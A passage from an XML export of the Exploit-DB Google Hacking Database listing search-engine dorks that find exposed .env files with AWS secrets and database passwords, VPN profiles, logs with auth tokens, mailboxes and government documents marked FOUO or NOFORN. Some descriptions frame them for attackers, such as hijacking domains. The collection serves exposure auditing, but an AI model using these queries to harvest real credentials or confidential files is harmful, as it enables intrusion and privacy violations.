<querystring>https://www.google.com/search?q=ext:yml | ext:txt | ext:env &quot;Database Connection Information Database server =&quot;</querystring>
<edb></edb>
<date>2020-12-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3619</id>
<link>https://www.exploit-db.com/ghdb/3619</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype: log inurl:&quot;access.log&quot; +intext:&quot;HTTP/1.1&quot;</shortDescription>
<textualDescription>Match some apache access.log files.
Author: susmab</textualDescription>
<query>filetype: log inurl:&quot;access.log&quot; +intext:&quot;HTTP/1.1&quot;</query>
<querystring>https://www.google.com/search?q=filetype:+log+inurl:%22access.log%22+%2Bintext:%22HTTP/1.1%22</querystring>
<edb></edb>
<date>2010-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>5656</id>
<link>https://www.exploit-db.com/ghdb/5656</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:&quot;xls | xlsx | doc | docx | ppt | pptx | pdf&quot; site:gov &quot;FOUO&quot; | &quot;NOFORN&quot; | &quot;Confidential&quot;</shortDescription>
<textualDescription>*Google Dork:* filetype:&quot;xls | xlsx | doc | docx | ppt | pptx | pdf&quot; site:gov &quot;FOUO&quot; | &quot;NOFORN&quot; | &quot;Confidential&quot;
*Description: *Files containing confidential information
*Author: * shivaGprasadh</textualDescription>
<query>filetype:&quot;xls | xlsx | doc | docx | ppt | pptx | pdf&quot; site:gov &quot;FOUO&quot; | &quot;NOFORN&quot; | &quot;Confidential&quot;</query>
<querystring>https://www.google.com/search?q=filetype:&quot;xls | xlsx | doc | docx | ppt | pptx | pdf&quot; site:gov &quot;FOUO&quot; | &quot;NOFORN&quot; | &quot;Confidential&quot;</querystring>
<edb></edb>
<date>2019-11-22</date>
<author>shivaGprasadh</author>
</entry>
<entry>
<id>476</id>
<link>https://www.exploit-db.com/ghdb/476</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:asp DBQ=&quot; * Server.MapPath(&quot;*.mdb&quot;)</shortDescription>
<textualDescription>This search finds sites using Microsoft Access databases, by looking for the the database connection string. There are forums and tutorials in the results, but also the real databases. An attacker can use this to find the name and location of the database and download it for his viewing pleasure, which may lead to information leakage or worse.</textualDescription>
<query>filetype:asp DBQ=&quot; * Server.MapPath(&quot;*.mdb&quot;)</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Aasp+DBQ%3D%22+%26+Server.MapPath%28%22*.mdb%22%29</querystring>
<edb></edb>
<date>2004-09-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>3794</id>
<link>https://www.exploit-db.com/ghdb/3794</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:avastlic</shortDescription>
<textualDescription>Lots of Avast Licenses .
Author : gr00ve_hack3r
www.gr00vehack3r.wordpress.com</textualDescription>
<query>filetype:avastlic</query>
<querystring>https://www.google.com/search?q=filetype:avastlic</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>3913</id>
<link>https://www.exploit-db.com/ghdb/3913</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:bak (inurl:php | inurl:asp | inurl:rb)</shortDescription>
<textualDescription>This one could be used to find all sorts of backup data, but this example
is limited to just common webapp extensions
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>filetype:bak (inurl:php | inurl:asp | inurl:rb)</query>
<querystring>https://www.google.com/search?q=filetype:bak (inurl:php | inurl:asp | inurl:rb)</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>457</id>
<link>https://www.exploit-db.com/ghdb/457</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:bkf bkf</shortDescription>
<textualDescription>This search will show backupfiles for xp/2000 machines.Of course these files could contain nearly everything, depending on the user selection and they can also be password protected.</textualDescription>
<query>filetype:bkf bkf</query>
<querystring>https://www.google.com/search?q=filetype%3Abkf+bkf</querystring>
<edb></edb>
<date>2004-09-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>795</id>
<link>https://www.exploit-db.com/ghdb/795</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:blt &quot;buddylist&quot;</shortDescription>
<textualDescription>AIM buddylists.</textualDescription>
<query>filetype:blt &quot;buddylist&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Ablt+%22buddylist%22</querystring>
<edb></edb>
<date>2004-12-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>237</id>
<link>https://www.exploit-db.com/ghdb/237</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:blt blt +intext:screenname</shortDescription>
<textualDescription>Reveals AIM buddy lists, including screenname and who's on their 'buddy' list and their 'blocked' list.</textualDescription>
<query>filetype:blt blt +intext:screenname</query>
<querystring>https://www.google.com/search?ie=utf-8&amp;oe=utf-8&amp;q=filetype%3Ablt+blt+%2Bintext%3Ascreenname</querystring>
<edb></edb>
<date>2004-05-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>405</id>
<link>https://www.exploit-db.com/ghdb/405</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:cfg auto_inst.cfg</shortDescription>
<textualDescription>Mandrake auto-install configuration files. These contain information about the installed packages, networking setttings and even user accounts.</textualDescription>
<query>filetype:cfg auto_inst.cfg</query>
<querystring>https://www.google.com/search?q=filetype%3Acfg+auto_inst.cfg</querystring>
<edb></edb>
<date>2004-08-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>792</id>
<link>https://www.exploit-db.com/ghdb/792</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:cnf inurl:_vti_pvt access.cnf</shortDescription>
<textualDescription>The access.cnf file is a &quot;weconfigfile&quot; (webconfig file) used by Frontpage Extentions for Unix. The install script called change_server.sh processes them. These files leak information about the realm name and the full path on the server for it.</textualDescription>
<query>filetype:cnf inurl:_vti_pvt access.cnf</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Acnf+inurl%3A_vti_pvt+access.cnf</querystring>
<edb></edb>
<date>2004-12-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>206</id>
<link>https://www.exploit-db.com/ghdb/206</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:conf inurl:firewall -intitle:cvs</shortDescription>
<textualDescription>These are firewall configuration files. Although these are often examples or sample files, in many cases they can still be used for information gathering purposes.</textualDescription>
<query>filetype:conf inurl:firewall -intitle:cvs</query>
<querystring>https://www.google.com/search?q=filetype%3Aconf+inurl%3Afirewall+-intitle%3Acvs</querystring>
<edb></edb>
<date>2004-05-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>685</id>
<link>https://www.exploit-db.com/ghdb/685</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:config web.config -CVS</shortDescription>
<textualDescription>Through Web.config an IIS adminstrator can specify settings like custom 404 error pages, authentication and authorization settings for the Web site. This file can hold a plaintext password in the worst case or just reveil the full path info on a 404 error.</textualDescription>
<query>filetype:config web.config -CVS</query>
<querystring>https://www.google.com/search?q=filetype%3Aconfig+web.config+-CVS</querystring>
<edb></edb>
<date>2004-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>807</id>
<link>https://www.exploit-db.com/ghdb/807</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:ctt Contact</shortDescription>
<textualDescription>This is for MSN Contact lists...</textualDescription>
<query>filetype:ctt Contact</query>
<querystring>https://www.google.com/search?safe=off&amp;c2coff=1&amp;q=filetype%3Actt+Contact</querystring>
<edb></edb>
<date>2005-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>295</id>
<link>https://www.exploit-db.com/ghdb/295</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:ctt ctt messenger</shortDescription>
<textualDescription>MSN Messenger uses the file extension *.ctt when you export the contact list. An attacker could use this for social enginering tricks.</textualDescription>
<query>filetype:ctt ctt messenger</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Actt+ctt+messenger</querystring>
<edb></edb>
<date>2004-06-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>5062</id>
<link>https://www.exploit-db.com/ghdb/5062</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:doc &quot;Answer Key&quot;</shortDescription>
<textualDescription>Find Answer Keys
filetype:doc &quot;Answer Key&quot;
Discovered By: Kevin Randall
</textualDescription>
<query>filetype:doc &quot;Answer Key&quot;</query>
<querystring>https://www.google.com/search?q=filetype:doc &quot;Answer Key&quot;</querystring>
<edb></edb>
<date>2019-01-02</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>3791</id>
<link>https://www.exploit-db.com/ghdb/3791</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:docx Domain Registrar $user $pass</shortDescription>
<textualDescription>Dork :- *filetype:docx Domain Registrar $user $pass*
Use :- *To find domain login password for Registrar (can Hijack Domain)
Submitted by : G00g!3 W@rr!0r
*</textualDescription>
<query>filetype:docx Domain Registrar $user $pass</query>
<querystring>https://www.google.com/search?q=filetype:docx Domain Registrar $user $pass</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>221</id>
<link>https://www.exploit-db.com/ghdb/221</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:eml eml +intext:&quot;Subject&quot; +intext:&quot;From&quot; +intext:&quot;To&quot;</shortDescription>
<textualDescription>These are oulook express email files which contain emails, with full headers. The information in these emails can be useful for information gathering about a target.</textualDescription>
<query>filetype:eml eml +intext:&quot;Subject&quot; +intext:&quot;From&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Aeml+eml+%2Bintext%3A%22Subject%22+%2Bintext%3A%22From%22+%2Bintext%3A%22To%22</querystring>
<edb></edb>
<date>2004-05-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>4746</id>
<link>https://www.exploit-db.com/ghdb/4746</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:env intext:&quot;APP_ENV&quot;</shortDescription>
<textualDescription># Exploit Title: Environment Laravel (PHP Framework) information disclosure
# Google Dork: filetype:env intext:&quot;APP_ENV&quot;
# Date: 05/04/2018
# Contains sensitive information:
username, password, mail accounts, etc.
# Dork Author: Carlos E. Vieira
</textualDescription>
<query>filetype:env intext:&quot;APP_ENV&quot;</query>
<querystring>https://www.google.com/search?q=filetype:env intext:&quot;APP_ENV&quot;</querystring>
<edb></edb>
<date>2018-04-05</date>
<author>Carlos E. Vieira</author>
</entry>
<entry>
<id>5725</id>
<link>https://www.exploit-db.com/ghdb/5725</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:env intext:APP_NAME</shortDescription>
<textualDescription>Google Dork: filetype:env intext:APP_NAME
Description: Find env file on laravel based website
containing database username and password, email username &amp; password
Category: File containing juicy information
</textualDescription>
<query>filetype:env intext:APP_NAME</query>
<querystring>https://www.google.com/search?q=filetype:env intext:APP_NAME</querystring>
<edb></edb>
<date>2020-02-03</date>
<author>Puneet Choudhary</author>
</entry>
<entry>
<id>4846</id>
<link>https://www.exploit-db.com/ghdb/4846</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:env intext:AWS_SECRET</shortDescription>
<textualDescription>.env files having AWS keys and other juicy info
Amal Jossy
</textualDescription>
<query>filetype:env intext:AWS_SECRET</query>
<querystring>https://www.google.com/search?q=filetype:env intext:AWS_SECRET</querystring>
<edb></edb>
<date>2018-06-06</date>
<author>Amal Jossy</author>
</entry>
<entry>
<id>4847</id>
<link>https://www.exploit-db.com/ghdb/4847</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:env intext:mail_host + intext:bluehost</shortDescription>
<textualDescription> .env files with Bluehost webmail username and password used by Laravel apps
Amal Jossy
</textualDescription>
<query>filetype:env intext:mail_host + intext:bluehost</query>
<querystring>https://www.google.com/search?q=filetype:env intext:mail_host + intext:bluehost</querystring>
<edb></edb>
<date>2018-06-06</date>
<author>Amal Jossy</author>
</entry>
<entry>
<id>403</id>
<link>https://www.exploit-db.com/ghdb/403</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:fp3 fp3</shortDescription>
<textualDescription>These are FileMaker Pro version 3 Databases.</textualDescription>
<query>filetype:fp3 fp3</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Afp3+fp3</querystring>
<edb></edb>
<date>2004-08-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>400</id>
<link>https://www.exploit-db.com/ghdb/400</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:fp5 fp5 -site:gov -site:mil -&quot;cvs log&quot;</shortDescription>
<textualDescription>These are various kinds of FileMaker Pro Databases (*.fp5 applies to both version 5 and 6).</textualDescription>
<query>filetype:fp5 fp5 -site:gov -site:mil -&quot;cvs log&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Afp5+fp5+-site%3Agov+-site%3Amil+-%22cvs+log%22</querystring>
<edb></edb>
<date>2004-08-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>404</id>
<link>https://www.exploit-db.com/ghdb/404</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:fp7 fp7</shortDescription>
<textualDescription>These are Filemaker Pro version 7 databases files.</textualDescription>
<query>filetype:fp7 fp7</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Afp7+fp7</querystring>
<edb></edb>
<date>2004-08-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4853</id>
<link>https://www.exploit-db.com/ghdb/4853</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:gitattributes intext:CHANGELOG.md -site:github.com</shortDescription>
<textualDescription>*Google* dork *description: *Find gitattributes on websites other than on
github repositories
*Google Search: *filetype:gitattributes intext:CHANGELOG.md -site:github.com
*Submitted by:* Alfie
*Website: (*https://the-infosec.com*)*
</textualDescription>
<query>filetype:gitattributes intext:CHANGELOG.md -site:github.com</query>
<querystring>https://www.google.com/search?q=filetype:gitattributes intext:CHANGELOG.md -site:github.com</querystring>
<edb></edb>
<date>2018-06-11</date>
<author>Alfie</author>
</entry>
<entry>
<id>5224</id>
<link>https://www.exploit-db.com/ghdb/5224</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:inc php -site:github.com -site:sourceforge.net</shortDescription>
<textualDescription>Include files containing source code... and sometimes connection strings...
General Search:
filetype:inc php -site:github.com -site:sourceforge.net
Connection Strings:
filetype:inc php AND mysqli|pdo -site:github.com -site:sourceforge.net
</textualDescription>
<query>filetype:inc php -site:github.com -site:sourceforge.net</query>
<querystring>https://www.google.com/search?q=filetype:inc php -site:github.com -site:sourceforge.net</querystring>
<edb></edb>
<date>2019-05-29</date>
<author>Dec0y</author>
</entry>
<entry>
<id>643</id>
<link>https://www.exploit-db.com/ghdb/643</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:inf inurl:capolicy.inf</shortDescription>
<textualDescription>The CAPolicy.inf file provides Certificate Servicces configuration information, which is read during initial CA installation an whenever you renew a CA certificate. The CApolicy.inf file defines settings specific to root CAs, as well as settings that affect all CAs in the CA hierarchiy.</textualDescription>
<query>filetype:inf inurl:capolicy.inf</query>
<querystring>https://www.google.com/search?q=filetype%3Ainf+inurl%3Acapolicy.inf&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;client=firefox&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2004-11-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>3739</id>
<link>https://www.exploit-db.com/ghdb/3739</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:ini &quot;Bootstrap.php&quot; (pass|passwd|password|pwd)</shortDescription>
<textualDescription>Zend application ini, with usernames, passwords and db info
love
Bastich</textualDescription>
<query>filetype:ini &quot;Bootstrap.php&quot; (pass|passwd|password|pwd)</query>
<querystring>https://www.google.com/search?q=filetype:ini &quot;Bootstrap.php&quot; (pass|passwd|password|pwd)</querystring>
<edb></edb>
<date>2011-08-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3844</id>
<link>https://www.exploit-db.com/ghdb/3844</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:ini &quot;This is the default settings file for new PHP installations&quot;</shortDescription>
<textualDescription>Finds PHP configuration files (php.ini) that have been placed in indexed
folders. Php.ini defines a PHP installation's behavior, including magic
quotes, register globals, and remote file operations. This can be useful
for knowing which attacks (such as RFI) are possible against the server.
- Andy G - twitter.com/vxhex</textualDescription>
<query>filetype:ini &quot;This is the default settings file for new PHP installations&quot;</query>
<querystring>https://www.google.com/search?q=filetype:ini &quot;This is the default settings file for new PHP installations&quot;</querystring>
<edb></edb>
<date>2013-04-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>228</id>
<link>https://www.exploit-db.com/ghdb/228</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:lic lic intext:key</shortDescription>
<textualDescription>License files for various software titles that may contain contact info and the product version, license, and registration in a .LIC file.</textualDescription>
<query>filetype:lic lic intext:key</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Alic+lic+intext%3Akey</querystring>
<edb></edb>
<date>2004-05-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>7385</id>
<link>https://www.exploit-db.com/ghdb/7385</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:log &quot;AUTHTOKEN&quot;</shortDescription>
<textualDescription># Google Dork: filetype:log &quot;AUTHTOKEN&quot;
# Files Containing Juicy Info
# Date:23/09/2021
# Exploit Author: Matheus Bolela</textualDescription>
<query>filetype:log &quot;AUTHTOKEN&quot;</query>
<querystring>https://www.google.com/search?q=filetype:log &quot;AUTHTOKEN&quot;</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Matheus Bolela</author>
</entry>
<entry>
<id>236</id>
<link>https://www.exploit-db.com/ghdb/236</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:log access.log -CVS</shortDescription>
<textualDescription>These are http server access logs which contain all sorts of information ranging from usernames and passwords to trusted machines on the network to full paths on the server. Could be VERY useful in scoping out a potential target.</textualDescription>
<query>filetype:log access.log -CVS</query>
<querystring>https://www.google.com/search?q=filetype%3Alog+access.log+-CVS&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-05-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>235</id>
<link>https://www.exploit-db.com/ghdb/235</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:log cron.log</shortDescription>
<textualDescription>Displays logs from cron, the *nix automation daemon. Can be used to determine backups, full and realtive paths, usernames, IP addresses and port numbers of trusted network hosts, or just about anything the admin of the box decides to automate. An attacker could use this information to possibly determine what extra vulnerable services are running on the machine, to find the location of backups, and, if the sysadmin uses cron to backup their logfiles, this cron log will give that away too.</textualDescription>
<query>filetype:log cron.log</query>
<querystring>https://www.google.com/search?q=filetype:log+cron.log&amp;spell=1</querystring>
<edb></edb>
<date>2004-05-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>8362</id>
<link>https://www.exploit-db.com/ghdb/8362</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:log intext:&quot;Account Number&quot;</shortDescription>
<textualDescription># Google Dork: filetype:log intext:&quot;Account Number&quot;
# Files Containing Juicy Info
# Date: 29/11/2023
# Exploit: Noor Alhomeed</textualDescription>
<query>filetype:log intext:&quot;Account Number&quot;</query>
<querystring>https://www.google.com/search?q=filetype:log intext:&quot;Account Number&quot;</querystring>
<edb></edb>
<date>2023-11-29</date>
<author>Noor Alhomeed</author>
</entry>
<entry>
<id>7424</id>
<link>https://www.exploit-db.com/ghdb/7424</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:log intext:(&quot;apache2&quot; | &quot;htdocs&quot;)</shortDescription>
<textualDescription># Google Dork: filetype:log intext:(&quot;apache2&quot; | &quot;htdocs&quot;)
# Files Containing Juicy Info
# Date:09/10/2021
# Exploit Author: Ritik Sahni</textualDescription>
<query>filetype:log intext:(&quot;apache2&quot; | &quot;htdocs&quot;)</query>
<querystring>https://www.google.com/search?q=filetype:log intext:(&quot;apache2&quot; | &quot;htdocs&quot;)</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Ritik Sahni</author>
</entry>
<entry>
<id>3970</id>
<link>https://www.exploit-db.com/ghdb/3970</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:log intext:org.apache.hadoop.hdfs</shortDescription>
<textualDescription>Dork : filetype:log intext:org.apache.hadoop.hdfs
List of Log files which contain details about internal and External ip in
Hadoop Grid
.This Log Files generated after every batch process.
--
Simmant Yadav</textualDescription>
<query>filetype:log intext:org.apache.hadoop.hdfs</query>
<querystring>https://www.google.com/search?q=filetype:log intext:org.apache.hadoop.hdfs</querystring>
<edb></edb>
<date>2014-10-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4743</id>
<link>https://www.exploit-db.com/ghdb/4743</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:log inurl:&quot;log&quot; &quot;[SERVER_SOFTWARE]&quot;</shortDescription>
<textualDescription>Plenty of juicy info
Bruno Schmid
</textualDescription>
<query>filetype:log inurl:&quot;log&quot; &quot;[SERVER_SOFTWARE]&quot;</query>
<querystring>https://www.google.com/search?q=filetype:log inurl:&quot;log&quot; &quot;[SERVER_SOFTWARE]&quot;</querystring>
<edb></edb>
<date>2018-04-04</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6755</id>
<link>https://www.exploit-db.com/ghdb/6755</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:log inurl:paypal</shortDescription>
<textualDescription># Author: - Hank Fordham
# Category: - juicy information
# Description: - This dork returns the logs which contains sensitive information like email addresses, timestamp etc.
# Google Dork: - filetype:log inurl:paypal
# Date: - 01/18/2021
</textualDescription>
<query>filetype:log inurl:paypal</query>
<querystring>https://www.google.com/search?q=filetype:log inurl:paypal</querystring>
<edb></edb>
<date>2021-01-19</date>
<author>Hank Fordham</author>
</entry>
<entry>
<id>217</id>
<link>https://www.exploit-db.com/ghdb/217</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:mbx mbx intext:Subject</shortDescription>
<textualDescription>These searches reveal Outlook v 1-4 or Eudora mailbox files. Often these are made public on purpose, sometimes they are not. Either way, addresses and email text can be pulled from these files.</textualDescription>
<query>filetype:mbx mbx intext:Subject</query>
<querystring>https://www.google.com/search?q=filetype:mbx+mbx+intext:Subject&amp;start=20&amp;sa=N</querystring>
<edb></edb>
<date>2004-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>3977</id>
<link>https://www.exploit-db.com/ghdb/3977</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:mobileconfig intext:password OR intext:pass</shortDescription>
<textualDescription>filetype:mobileconfig intext:password OR intext:pass</textualDescription>
<query>filetype:mobileconfig intext:password OR intext:pass</query>
<querystring>https://www.google.com/search?q=filetype:mobileconfig intext:password OR intext:pass</querystring>
<edb></edb>
<date>2014-11-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>686</id>
<link>https://www.exploit-db.com/ghdb/686</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:myd myd -CVS</shortDescription>
<textualDescription>MySQL stores its data for each database in individual files with the extension MYD.An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database.</textualDescription>
<query>filetype:myd myd -CVS</query>
<querystring>https://www.google.com/search?num=100&amp;c2coff=1&amp;q=++filetype%3Amyd+myd+-CVS</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>682</id>
<link>https://www.exploit-db.com/ghdb/682</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:ns1 ns1</shortDescription>
<textualDescription>Netstunbler files contain information about the wireless network. For a cleanup add stuff like: +&quot;Creator&quot; +&quot;Format&quot; +&quot;DateGMT&quot;.</textualDescription>
<query>filetype:ns1 ns1</query>
<querystring>https://www.google.com/search?q=filetype%3Ans1+ns1</querystring>
<edb></edb>
<date>2004-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>3754</id>
<link>https://www.exploit-db.com/ghdb/3754</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:old (define)(DB_USER|DB_PASS|DB_NAME)</shortDescription>
<textualDescription>this dork locates backed up config files
filetype:php~ (define)(DB_USER|DB_PASS|DB_NAME)
filetype:inc~ (define)(DB_USER|DB_PASS|DB_NAME)
filetype:inc (define)(DB_USER|DB_PASS|DB_NAME)
filetype:bak (define)(DB_USER|DB_PASS|DB_NAME)
Author: Gerald J. Pottier III</textualDescription>
<query>filetype:old (define)(DB_USER|DB_PASS|DB_NAME)</query>
<querystring>https://www.google.com/search?q=filetype:old (define)(DB_USER|DB_PASS|DB_NAME)</querystring>
<edb></edb>
<date>2011-11-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>3755</id>
<link>https://www.exploit-db.com/ghdb/3755</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:old (mysql_connect) ()</shortDescription>
<textualDescription>There are three of mysql_connects but that all search in .inc or
warnings, non search for .old . Dot old is something that all devs to
to hide old files they do not want to delete immediatly but almost
always forget to delete. The server lang can be changed.
:D
--
Gerald J. Pottier III
Senior Managed Systems Engineer :STG inc.
Hereford, AZ 85615
[Home] 520.843.0135
[Work] 520.538.9684</textualDescription>
<query>filetype:old (mysql_connect) ()</query>
<querystring>https://www.google.com/search?q=filetype:old (mysql_connect) ()</querystring>
<edb></edb>
<date>2011-11-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>394</id>
<link>https://www.exploit-db.com/ghdb/394</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:ora ora</shortDescription>
<textualDescription>Greetings, The *.ora files are configuration files for oracle clients. An attacker can identify a oracle database this way and get more juicy information by searching for ora config files.This search can be modified to be more specific:- filetype:ora sqlnet - filetype:ora names</textualDescription>
<query>filetype:ora ora</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Aora+ora</querystring>
<edb></edb>
<date>2004-08-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>888</id>
<link>https://www.exploit-db.com/ghdb/888</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:ora tnsnames</shortDescription>
<textualDescription>This searches for tns names files. This is an Oracle configuration file that sets up connection strings for someone's Oracle client to contact the various databases it is managing. This file contains ports, IP's and server names of these database machines. What I think is more telling is that in most cases, this file is stored in Oracle's installation directory which can probably be more telling.</textualDescription>
<query>filetype:ora tnsnames</query>
<querystring>https://www.google.com/search?safe=off&amp;c2coff=1&amp;q=filetype%3Aora+tnsnames</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4055</id>
<link>https://www.exploit-db.com/ghdb/4055</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pac inurl:&quot;/proxy&quot;</shortDescription>
<textualDescription>Search the Web Proxy Autodiscovery Protocol
Ing. Daniel Maldonadohttp://www.caceriadespammers.com.ar</textualDescription>
<query>filetype:pac inurl:&quot;/proxy&quot;</query>
<querystring>https://www.google.com/search?q=filetype:pac inurl:&quot;/proxy&quot;</querystring>
<edb></edb>
<date>2015-08-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4018</id>
<link>https://www.exploit-db.com/ghdb/4018</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pcf vpn OR Group</shortDescription>
<textualDescription>Google Dork: filetype:pcf vpn OR Group
Author: azupwn
This dork allows you to search for publicly accessible profile
configuration files (.pcf) used by VPN clients. These files typically
contain usernames, password, tunneling ports, VPN server information and
other information.
Cheers,
--
azupwn</textualDescription>
<query>filetype:pcf vpn OR Group</query>
<querystring>https://www.google.com/search?q=filetype:pcf vpn OR Group</querystring>
<edb></edb>
<date>2015-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4408</id>
<link>https://www.exploit-db.com/ghdb/4408</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pcmcfg</shortDescription>
<textualDescription>Google Dork: filetype:pcmcfg
Author: Tarkan Catal X
This dork allows you to search for installation template file used by pulseway application (.pcmcfg). This file contains usernames, passwords (encrypted) and server information.
Pulseway is an remote monitoring and management software www.pulseway.com</textualDescription>
<query>filetype:pcmcfg</query>
<querystring>https://www.google.com/search?q=filetype:pcmcfg</querystring>
<edb></edb>
<date>2017-03-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>472</id>
<link>https://www.exploit-db.com/ghdb/472</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pdb pdb backup (Pilot | Pluckerdb)</shortDescription>
<textualDescription>Hotsync database files can be found using &quot;All databases on a Palm device, including the ones you create using NS Basic/Palm, have the same format. Databases you create using NS Basic/Palm have the backup bit set by default, so they are copied to your &quot;x:\palm\{username}\backup&quot;The forum members suggested adding Pilot and Pluckerdb (linux software for pda), so the results are more clean. (pdb files can be used for protein databases, which we don't want to see).Currently we don't know of a program to &quot;read&quot; these binary files.</textualDescription>
<query>filetype:pdb pdb backup (Pilot | Pluckerdb)</query>
<querystring>https://www.google.com/search?q=filetype%3Apdb+pdb+backup+%28Pilot+%7C+Pluckerdb%29+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-09-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3941</id>
<link>https://www.exploit-db.com/ghdb/3941</link>
<category>Files Containing Juicy Info</category>
<shortDescription>filetype:pdf &quot;acunetix website audit&quot; &quot;alerts summary&quot;</shortDescription>
<textualDescription>Finds reports generated by Acunetix scans.
- Andy G - twitter.com/vxhex</textualDescription>
